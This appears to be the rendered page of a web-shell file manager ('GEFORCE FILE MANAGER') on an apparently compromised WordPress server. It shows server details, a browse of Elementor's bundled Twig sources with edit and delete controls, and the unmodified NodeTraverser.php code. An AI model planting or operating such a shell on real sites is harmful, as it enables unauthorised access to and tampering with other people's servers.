[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor
/
vendor_prefixed
/
twig
/
twig
/
twig
/
src
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Attribute
SET
[ DEL ]
📁 Cache
SET
[ DEL ]
📁 Error
SET
[ DEL ]
📁 Extension
SET
[ DEL ]
📁 Loader
SET
[ DEL ]
📁 Node
SET
[ DEL ]
📁 NodeVisitor
SET
[ DEL ]
📁 Profiler
SET
[ DEL ]
📁 Resources
SET
[ DEL ]
📁 Runtime
SET
[ DEL ]
📁 RuntimeLoader
SET
[ DEL ]
📁 Sandbox
SET
[ DEL ]
📁 Test
SET
[ DEL ]
📁 TokenParser
SET
[ DEL ]
📁 Util
SET
[ DEL ]
📄 Environment.php
26,466 B
SET
[ EDIT ]
|
[ DEL ]
📄 Lexer.php
19,539 B
SET
[ EDIT ]
|
[ DEL ]
📄 Markup.php
949 B
SET
[ EDIT ]
|
[ DEL ]
📄 NodeTraverser.php
1,857 B
SET
[ EDIT ]
|
[ DEL ]
📄 Template.php
15,246 B
SET
[ EDIT ]
|
[ DEL ]
📄 Token.php
5,475 B
SET
[ EDIT ]
|
[ DEL ]
📄 TwigFilter.php
3,370 B
SET
[ EDIT ]
|
[ DEL ]
📄 TwigTest.php
2,460 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: NodeTraverser.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace ElementorDeps\Twig; use ElementorDeps\Twig\Node\Node; use ElementorDeps\Twig\NodeVisitor\NodeVisitorInterface; /** * A node traverser. * * It visits all nodes and their children and calls the given visitor for each. * * @author Fabien Potencier <fabien@symfony.com> */ final class NodeTraverser { private $env; private $visitors = []; /** * @param NodeVisitorInterface[] $visitors */ public function __construct(Environment $env, array $visitors = []) { $this->env = $env; foreach ($visitors as $visitor) { $this->addVisitor($visitor); } } public function addVisitor(NodeVisitorInterface $visitor) : void { $this->visitors[$visitor->getPriority()][] = $visitor; } /** * Traverses a node and calls the registered visitors. */ public function traverse(Node $node) : Node { \ksort($this->visitors); foreach ($this->visitors as $visitors) { foreach ($visitors as $visitor) { $node = $this->traverseForVisitor($visitor, $node); } } return $node; } private function traverseForVisitor(NodeVisitorInterface $visitor, Node $node) : ?Node { $node = $visitor->enterNode($node, $this->env); foreach ($node as $k => $n) { if (null !== ($m = $this->traverseForVisitor($visitor, $n))) { if ($m !== $n) { $node->setNode($k, $m); } } else { $node->removeNode($k); } } return $visitor->leaveNode($node, $this->env); } }